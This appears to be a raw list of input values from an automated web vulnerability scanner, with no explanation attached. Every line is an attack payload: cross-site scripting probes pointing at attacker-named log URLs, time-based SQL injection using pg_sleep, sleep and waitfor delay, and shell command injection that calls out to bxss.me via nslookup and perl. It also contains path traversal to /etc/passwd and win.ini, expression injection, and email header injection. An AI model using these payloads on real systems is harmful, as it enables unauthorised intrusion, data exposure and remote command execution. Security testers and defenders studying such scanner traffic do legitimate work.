http://attacker-9094/log.php?
}body{acu:Expre/**/SSion(QW6U(9620))}
\u003CScRiPt\QW6U(9539)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%51%57%36%55%289720%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9295/log.php?
}body{acu:Expre/**/SSion(TjbA(9336))}
\u003CScRiPt\TjbA(9234)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%54%6A%62%41%289700%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9359/log.php?
}body{acu:Expre/**/SSion(Y90O(9748))}
\u003CScRiPt\Y90O(9797)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%59%39%30%4F%289204%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9839/log.php?
http://attacker-9254/log.php?
}body{acu:Expre/**/SSion(CkoU(9186))}
}body{acu:Expre/**/SSion(OH8l(9968))}
\u003CScRiPt\CkoU(9942)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%43%6B%6F%55%289413%29%3C%2F%73%43%72%69%70%54%3E
\u003CScRiPt\OH8l(9280)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%4F%48%38%6C%289669%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
''||(select 1 from (select pg_sleep(15))x)||''
'||(select 1 from (select pg_sleep(15))x)||'
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
ZMH4njgk')) OR 893=(SELECT 893 FROM PG_SLEEP(15))--
t08GPCFU') OR 918=(SELECT 918 FROM PG_SLEEP(15))--
p4BQJG08' OR 19=(SELECT 19 FROM PG_SLEEP(15))--
-1)) OR 597=(SELECT 597 FROM PG_SLEEP(15))--
-5) OR 552=(SELECT 552 FROM PG_SLEEP(15))--
-5 OR 786=(SELECT 786 FROM PG_SLEEP(15))--
1 waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(sele...
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
if(now()=sysdate(),sleep(15),0)
-1 OR 3+273-273-1=0+0+0+1
-1 OR 2+273-273-1=0+0+0+1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
'+'A'.concat(70-3).concat(22*4).concat(101).concat(86).concat(110).concat(90)+(require'socket'
So...
HttP://bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(116).concat(70).concat(115).concat(73)+(require"socket"
So...
`(nslookup hityzknmyvxgye4f41.bxss.me||perl -e "gethostbyname('hityzknmyvxgye4f41.bxss.me')")`
|(nslookup hithtyiluqofha83ee.bxss.me||perl -e "gethostbyname('hithtyiluqofha83ee.bxss.me')")
&(nslookup hitfuznlfkfyl470c0.bxss.me||perl -e "gethostbyname('hitfuznlfkfyl470c0.bxss.me')")&'\"...
$(nslookup hitvcojmcozqv6b386.bxss.me||perl -e "gethostbyname('hitvcojmcozqv6b386.bxss.me')")
http://bxss.me/t/fit.txt?.jpg
(nslookup hitrppydploxle1ac2.bxss.me||perl -e "gethostbyname('hitrppydploxle1ac2.bxss.me')")
ctime
sleep
p0
(I30
tp1
Rp2
.
|echo kasivf$()\ exkvaj\nz^xyu||a #' |echo kasivf$()\ exkvaj\nz^xyu||a #|" |echo kasivf$()\ exkva...
1some_inexistent_file_with_long_name
&echo ojiqhh$()\ gkcuzg\nz^xyu||a #' &echo ojiqhh$()\ gkcuzg\nz^xyu||a #|" &echo ojiqhh$()\ gkcuz...
".gethostbyname(lc("hitzu"."cayqnvdha1642.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(90)...
echo xpeshb$()\ qbjjku\nz^xyu||a #' &echo xpeshb$()\ qbjjku\nz^xyu||a #|" &echo xpeshb$()\ qbjjku...
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
'.gethostbyname(lc('hithk'.'dwbdjpdad82bf.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(74)...
../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../etc/passwd
"+response.write(9953143*9155424)+"
'+response.write(9953143*9155424)+'
to@example.com>
bcc:074625.19373-146623.19373.2c5e2.19130.2@bxss.me
bcc:074625.19373-146622.19373.2c5e2.19130.2@bxss.me
response.write(9953143*9155424)